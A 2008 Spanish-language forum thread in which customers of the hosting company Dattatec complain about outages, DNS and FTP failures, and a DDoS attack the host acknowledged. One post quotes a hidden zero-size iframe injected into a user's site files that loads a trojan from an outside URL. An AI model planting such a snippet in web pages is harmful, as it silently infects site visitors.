Administración Web /

[HOSTING] DATTATEC se murió??

Participa en el tema [HOSTING] DATTATEC se murió?? en el foro Administración Web.
a mi no me deja conectarme a los FTP desde el lunes pero por lo ...27

Buscar en este tema:

•  
    Payasin escribió hace 4 años

#1 [HOSTING] DATTATEC se murió??
    Mostrar el primer mensaje completo
  • #261 Re: DATTATEC se murió??

a mi no me deja conectarme a los FTP desde el lunes
    pero por lo menos tenía las páginas online...

Alguien puede explicar mejor eso del ataque, que onda?

a alguien le tardo una semana en llegar un mail y se perdio un laburo de 10 lucas por mes y en un rapto de furia salvaje decidió reclutar un equipo de hackers destrozaservers y destruir el imperio informático de tornatore y sus secuaces??!?

o simplemente son garcas

(perdon que me lo tome con humor, es que si no empiezo a asesinar gente aleatoriamente)
    Me gusta este mensaje
  • #262 Re: DATTATEC se murió??

Originalmente publicado por elchanga Ver mensaje
    mis sitios que no funcionan
    www.salonelhormiguero.com.ar
    www.fiestascosmic.com.ar
    www.disfrazados.com.ar
    entre otros
    loco que nos bonifiquen
    lo peor es que no te ande el mail perdes laburo a morir
    Es cosa de creer o reventar, pero pude acceder a www.disfrazados.com.ar, a los otros 2 no
    Me gusta este mensaje
  • #263 Re: DATTATEC se murió??

A mi cada vez que funciona, al rato me aparece la siguiente linea agregada en los archivos de mi sitio. <IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>

el antivirus kaspersky lo detecta como un troyano que genera trafico o sea que usa la maquina del que accede a tu sitio como un zombie.

Alguien sabe exactamente que hace esto?
    Me gusta este mensaje
  • #264 Re: DATTATEC se murió??

hablé con minutouno.com y van a ver de poner una nota sobre el tema.
    yo veo intermitentemente desde ayer y muy pocas veces algunos servidores.
    algunos ftp me entraron, pero en general no.
    fijense si sale algo en minutouno.com, ya hice lo mejor que pude para que se arregle todo
    saludos!
    Me gusta este mensaje
  • #265 Re: DATTATEC se murió??

Tantos intentos para entrar al soporte y esto es lo que ponen:
    Estimado usuario:

Le comunicamos que en el dia de ayer estuvimos sufriendo un ataque de denegacion de servicio (DDoS), inconveniente que ya ha sido solventado, de todas manera aun estamos trabajando en nuestros dns, por lo que es posible que note algunas intermitencias en el servicio.-
    Quedamos a su disposición para cualquier consulta adicional.-
    Saludos cordiales.
    ------------------------------------
    Mauricio
    Soporte técnico
    Dattatec.com
    Hosting Solutions
    De todas formas debo reconocer que al menos a mi siempre me han respondido con rapidez mis consultas. Es algo que no me termina de cerrar, es decir, Dattatec no parece una empresa montada sobre un garage, hay personal atendiendo consultas, tienen servicio para varios países, invierten en publicidad, el sitio está bien mantenido, que se yo... realmente debemos pensar en un tipo de conspiración y que es todo una fachada para atrapar gente y cagarlos? a ellos tampoco les conviene esto que está pasando acá, que todos nos quejemos, que en todos los foros se diga que su servicio es una cagada. No se, no me termina de cerrar esto. En otros foros "defensores" de dattatec decían que por el precio (del plan inicio) que se está pagando es lógico que funcione mal, ya que le dan prioridad a los que tienen mejores planes (de todas formas no se justificaría ! o de última que no promocionen 24hs online !), pero muchos usuarios tienen problemas incluso con servidores dedicados.
    Tal vez en algún punto se les fue de las manos, en otros lugares también se quejan porque para colmo Dattatec está creciendo día a día en cuanto a usuarios y planes, y por ahí tal vez viene la mano, los ratas están exprimiendo su "Cuatro86" a todo lo que da en lugar de aumentar las inversiones.
    Me gusta este mensaje
  • #266 Re: DATTATEC se murió??

como ya dijeron antes
    JUEVES 24/01/2008 12:03
    DATTATEC ONLINE

al menos su sitio principal...ya que todos mis dominios no resuelven DNS
    Me gusta este mensaje
  • #267 Re: DATTATEC se murió??

Originalmente publicado por enridp Ver mensaje
    Recién al menos pude entrar a la web principal de dattatec. Hay una animación donde se "derrumba" todo el sitio y un salame sentado que dice "bye" al final.
    Es una especie de chiste o que?
    Que bien que nos cagaron la verdad... como no entré antes a foros como este para enterarme de la mierda de servicio que tenían. Por suerte lo descubrí antes de contratar un servicio dedicado.
    Se trata de la nueva version de la pagina, lo que se derrumba es la version anterior del sitio y apare despues la "nueva cara". No es ninguna alegoria a lo que nos esta pasando. Solo indica que paso me malo a peor
    Che y no posra estar pasando todo esto porque estan migrando los Servidores XT - DX486 - Pentium MMX200 a una granja de servidores con 8 procesadores Xeon QuadCorer por servidor con varios Teras de capacidad en disco y decenas de Gigas de memo, falta que pongan "Estamos trabanjando para brindarle cada dia un mejor servicio" por si lo llegan a mencionar, cante pri por los derechos de autor eh! jaja
    Me gusta este mensaje
  • #268 Re: DATTATEC se murió??

me gustaria crear un lista blanca de todos los usuarios de dattatec, para ponernos en contacto via msn
    msn: ilgatto@live.com.ar
    Me gusta este mensaje
  • #269 Re: DATTATEC se murió??

les quería decir que recibí un ticket de respuesta que decía escuetamente que "estamos terminando de solucionar todo"

saludos!

Originalmente publicado por ilG@TTO Ver mensaje
    me gustaria crear un lista blanca de todos los usuarios de dattatec, para ponernos en contacto via msn
    msn: ilgatto@hotmail.com

agregame, splashtrack@gmail.com

podriamos armar un grupo de google no?

saludos
    Me gusta este mensaje
  • #270 Re: DATTATEC se murió??

Originalmente publicado por ilG@TTO Ver mensaje
    msn: ilgatto@hotmail.com
    supersapsap@hotmail.com

por favor vean esto

http://www.dattatec.com/nicole.php

en esto gastan el tiempo en lugar de arreglar el servidor???

hummm!!
    Me gusta este mensaje

LinkBacks: http://www.psicofxp.com/forums/administracion-web.275/303921-hosting-dattatec-se-murio.html

Estadísticas del tema
  • 372 RESPUESTAS
  • 50997 VISTAS
  • 113 USUARIOS RESPONDIERON

Ir arriba
Contacto | Acerca de | Ayuda | Términos Legales | privacidad | Pautas de convivencia | Mapa de los foros | TrabajÁ con nosotros
©2008 Psicofxp.com S.A. - Todos los derechos reservados
Certifica IAB